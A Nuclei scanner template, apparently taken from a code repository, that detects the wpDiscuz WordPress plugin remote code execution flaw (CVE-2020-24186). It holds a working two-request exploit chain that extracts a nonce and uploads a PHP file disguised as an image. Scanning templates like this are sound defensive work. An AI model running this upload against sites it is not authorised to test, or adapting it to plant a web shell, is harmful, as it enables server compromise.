89 lines
2.6 KiB
YAML
89 lines
2.6 KiB
YAML
id: CVE-2020-24186
|
|
|
|
info:
|
|
name: WordPress wpDiscuz <=7.0.4 - Remote Code Execution
|
|
author: Ganofins
|
|
severity: critical
|
|
description: WordPress wpDiscuz plugin versions version 7.0 through 7.0.4 are susceptible to remote code execution. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP
|
|
files, and achieve remote code execution on a vulnerable site's server.
|
|
reference:
|
|
- https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-24186
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
|
cvss-score: 10.0
|
|
cve-id: CVE-2020-24186
|
|
cwe-id: CWE-434
|
|
tags: cve,cve2020,wordpress,wp-plugin,rce,upload
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
GET /?p=1 HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept: */*
|
|
|
|
- |
|
|
POST /wp-admin/admin-ajax.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
X-Requested-With: XMLHttpRequest
|
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary88AhjLimsDMHU1Ak
|
|
Origin: {{BaseURL}}
|
|
Referer: {{BaseURL}}
|
|
|
|
------WebKitFormBoundary88AhjLimsDMHU1Ak
|
|
Content-Disposition: form-data; name="action"
|
|
|
|
wmuUploadFiles
|
|
------WebKitFormBoundary88AhjLimsDMHU1Ak
|
|
Content-Disposition: form-data; name="wmu_nonce"
|
|
|
|
{{wmuSecurity}}
|
|
------WebKitFormBoundary88AhjLimsDMHU1Ak
|
|
Content-Disposition: form-data; name="wmuAttachmentsData"
|
|
|
|
undefined
|
|
------WebKitFormBoundary88AhjLimsDMHU1Ak
|
|
Content-Disposition: form-data; name="wmu_files[0]"; filename="rce.php"
|
|
Content-Type: image/png
|
|
|
|
{{base64_decode('/9j/4WpFeGlmTU0q/f39af39Pv39/f39/f39/f2o/f39/cD9/f39/f39/f39/f/g/UpGSUb9/f39/9tD/f0M/QwK/f0=')}}
|
|
<?php phpinfo();?>
|
|
------WebKitFormBoundary88AhjLimsDMHU1Ak
|
|
Content-Disposition: form-data; name="postId"
|
|
|
|
1
|
|
------WebKitFormBoundary88AhjLimsDMHU1Ak--
|
|
|
|
extractors:
|
|
- type: regex
|
|
part: body
|
|
internal: true
|
|
name: wmuSecurity
|
|
group: 1
|
|
regex:
|
|
- 'wmuSecurity":"([a-z0-9]+)'
|
|
|
|
- type: regex
|
|
part: body
|
|
group: 1
|
|
regex:
|
|
- '"url":"([a-z:\\/0-9-.]+)"'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
- type: word
|
|
words:
|
|
- 'success":true'
|
|
- 'fullname'
|
|
- 'shortname'
|
|
- 'url'
|
|
condition: and
|
|
part: body
|
|
|
|
# Enhanced by mp on 2022/04/19
|